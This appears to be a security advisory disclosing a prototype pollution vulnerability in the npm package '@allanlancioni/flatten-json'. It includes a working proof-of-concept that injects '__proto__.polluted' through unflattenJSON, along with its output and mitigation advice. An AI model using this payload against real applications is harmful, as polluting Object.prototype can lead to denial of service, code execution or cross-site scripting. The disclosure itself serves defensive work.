The vulnerability located at module.exports.unflattenJSON (flatten-json/index.js:42) where the source's property is unsafely assigned to the destination.
An attacker can be exploit this method to inject malicious payload via built-in Object through the special properties __proto__ or constructor.prototype.
Thus, the attacker can use one of these properties to pollute the application logic that can be escalated to Denial of service,
remote code execution or cross-site scripting attacks.
(async () => {
const lib = await import('@allanlancioni/flatten-json');
var victim = {}
console.log("Before Attack: ", JSON.stringify(victim.__proto__));
try {
lib.default.unflattenJSON ({ "__proto__.polluted": true})
} catch (e) { }
console.log("After Attack: ", JSON.stringify(victim.__proto__));
delete Object.prototype.polluted;
})();
Output:
Before Attack: {}
After Attack: {"polluted":true}Output of a successful fix:
Before Attack: {}
After Attack: {}No updates were provided by the maintainer. Users of this module are urged to implement proper santization and validation over user's supplied inputs, such as blocking inputs containing __proto__ and contructor.prototype